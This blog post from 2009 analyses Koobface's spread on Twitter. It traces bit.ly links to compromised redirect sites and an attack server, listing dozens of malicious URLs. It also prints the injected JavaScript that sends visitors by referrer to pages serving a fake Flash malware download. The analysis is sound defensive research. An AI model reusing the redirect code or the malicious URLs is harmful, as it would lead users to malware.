We would love to stay in touch with you!

Enter your details to join our mailing list and we'll send you a link to exclusive content.

* indicates required
Close

Koobface migrates to Twitter

by Jago Maniscalchi  //  August 10, 2009  //  Exploits and Malware  //  No comments

Koobface migrated to Twitter and launched a posting frenzy at the end of last week. In a bit to avoid detection it is generating unique posts using bit.ly links and a series of suffixes including “;)” and “OMFG!!”. These are appended to the original “My home video :) ” message.

Twitter has cleaned up the majority of the posts today – the example below contains the few remaining affected tweets.

koobface-twitter

The links point to a new Facebook masquarade that invites a user to download ‘Flash’. This download contains the koobface malware. The site is now down – the screenshot is from viruslist.com analysis of the new Koobface varient.

koobface-facebook

A sensible place to start analysis seemed to be the bit.ly links. To work out where they were pointing, I used the Twitter search API to pull back 449 infected tweets. 415 unique bit.ly links were successfully extracted from these posts. By visiting the URLs and examining the Location: header, it is possible to see where the links point to.

Most of the URLs extracted from the bit.ly links were unique as a result of a unqiue identifier used by the new koobface varient. The two URLs responsible for the majority (over 400) of the affected links are:


http://kukuruku-290709.com/go/tw.php?

http://uppinorr.se/publicm0vies/?

Both of these sites were unavailable today. The remainder, which all included the GET parameter “youtube.com” actually redirected to kukuruku-290709.com in a rather complicated fashion. The sites used as redirect are:


http://aricosenza.it/beestc1ips/?youtube.com

http://augustinus-vijfhuizen.nl/beestacti0n/

http://billig-bauer.de/amalzlngperf0rmans/

http://billig-bauer.de/pub1icdem0nstrati0n/

http://branislavkaan.php5.sk/amalzlngdem0nstrati0n/?youtube.com

http://cmpmiami.com/fantasticc1ip/?youtube.com

http://costasunwear.com/freeem0vie/?youtube.com

http://donaldon.u109.hosting365.ie/fantasticvlds/?youtube.com

http://donaldon.u109.hosting365.ie/fuunnym0vie/?youtube.com

http://e.freewebhostingarea.com/403.html

http://fafnir.php5.sk/fuunnyfi1ms/?youtube.com

http://ghadeer.com.au/meggattube/?youtube.com

http://goldstarjanitorial.com/freeem0vies/?youtube.com

http://grfa-g-athin.att.sch.gr/fantasticvide0/

http://grfa-g-athin.att.sch.gr/uncens0redperf0rmans/

http://gvpschekschov.iv-edu.ru/c00lttube/

http://investment-claims.ru/amalzlngvide0/

http://jurisprudence-media.org/extrlmetw/

http://kimchistory.freevar.com/c00ldwd/?youtube.com

http://kupimlink.ru/y0urperf0rmans/?youtube.com

http://legalpractice-media.ru/amalzlngsh0w/

http://legalpractice-media.ru/privalem0vies/

http://liveinczech.com/fantasticsh0w/?youtube.com

http://lpexpressions.com/youtube.com/?youtube.com

http://manish.ueuo.com/privaleacti0n/?youtube.com

http://mochalova.ru/extrlmec1ip/?youtube.com

http://Moldova.6te.net/privalec1ip/?youtube.com

http://petcorpoplast.com/extrlmem0vies/?youtube.com

http://remontik.msk.ru/pub1icsh0w/?youtube.com

http://rodokmen.korektor.cz/extrlmefi1ms/?youtube.com

http://rtprestaurantguide.com/freeeacti0n/?youtube.com

http://skill-makers.yoyo.pl/fuunnydem0nstrati0n/?youtube.com

http://strovelstorps-btk.se/fantasticsh0w/

http://usdnotocalcio.com/freeeperf0rmans/?youtube.com

http://villatania.com/mmyc1ip/?youtube.com

http://weingutmueller2.we.funpic.de/uncens0redfi1ms/?youtube.com

http://www.aricosenza.it/beestc1ips/?youtube.com

http://www.eskalators.lv/pub1icm0vie/?youtube.com

http://www.manish.ueuo.com/privaleacti0n/?youtube.com

http://www.skill-makers.yoyo.pl/fuunnydem0nstrati0n/?youtube.com

http://www.solardynamicsinc.com/amalzlngdwd/?youtube.com

http://www.sunriseelectro.com.ua/uncens0redfi1ms/?youtube.com

http://www.usdnotocalcio.com/freeeperf0rmans/?youtube.com

http://www.villatania.com/mmyc1ip/?youtube.com

http://www.vyznamovyslovnik.cz/pub1icacti0n/?youtube.com

http://x-x.wz.cz/extrlmem0vies/?youtube.com

Most of these sites (I haven’t checked them all) use JavaScript to forward to kukuruku-290709.com, generating the URL from a combination of the search term used (in this case “youtube.com”, the referrer (in this case a “twitter.com” address) and the particular launchpad used.

The site first defines the domain name used for the resultant URL and extracts the search term.

// KROTEG
var abc1 = 'http://kukuruku-290709.com/go/';
var abc2 = 'http://kukuruku-290709.com/go/';
var ss = '' + location.search;
if ((location.search).length>0) abc = abc1; else abc = abc2;

A series of redirects are defined. These determine which php script is called on the attack server. Users clicking a koobface link on facebook.com (as determined by location.referrer), for example, will end up visiting http://kukuruku-290709.com/go/fb.php. It isn’t clear to me why this happens. Presumably it is used to control which one of a number of masquarade sites is shown. It would perhaps make more sense to show a twitter user a twitter site than a facebook site.

var redirects = [
['facebook.com',  abc+'fb.php'],
['tagged.com',    abc+'tg.php'],
['friendster.com',abc+'fr.php'],
['myspace.com',   abc+'ms.php'],
['msplinks.com',  abc+'ms.php'],
['myyearbook.com',abc+'yb.php'],
['fubar.com',     abc+'fu.php'],
['twitter.com',   abc+'tw.php'],
['hi5.com',       abc+'hi5.php'],
['bebo.com',      abc+'be.php']
];
var s = '' + document.referrer, r = false;

The code loops through the defined referrer domains and the appropriate php file is chosen. A URL is constructed that inserts the original search term (“youtube.com” in all our examples) and then appends a second parameter (“domain”) which is set to the host of the redirect server.

If no referrer match is found, the default index.php is used, and no “domain” parameter is passed.

for (var i = 0; i < redirects.length; i ++) {
if ((s.indexOf(redirects[i][0]) != -1)) {
     var redir=redirects[i][1] + location.search;
     if ((location.search).length>0) redir=redir+'&domain='+location.host; else redir=redir+'?domain='+location.host;
     location.href = redir;
     r = true;
     break;
}
}
if (!r) location.href = abc+'index.php'+ location.search;

Using patterns in the redirect servers URLs, a few additional sites were discovered that also point to the same attack server.


http://www.vernonvalleypt.com/c00lttube/

http://www.solardynamicsinc.com/privaleacti0n/

http://www.jsft.org.sa/fuunnydem0nstrati0n/

While the majority of the redirect servers are still online, the two attack servers are now offline. Because all links effectively end with the two offline sites, this iteration of koobface is effectively finished.

About the Author

Jago Maniscalchi is a Cyber security consultant, though he tries to avoid the word "Cyber" at all costs. He has spent 15 years working with Information Systems and has experience in website hosting, software engineering, infrastructure management, data analysis and security assessment. Jago lives in London with his family, enough pets to start a small zooalogical society, and a Samsung NaviBot Robotic Vacuum Cleaner. Despite an aptitude for learning computer languages, his repeated attempts to learn Italian have resulted in spectacular failure.

Leave a Comment

comm comm comm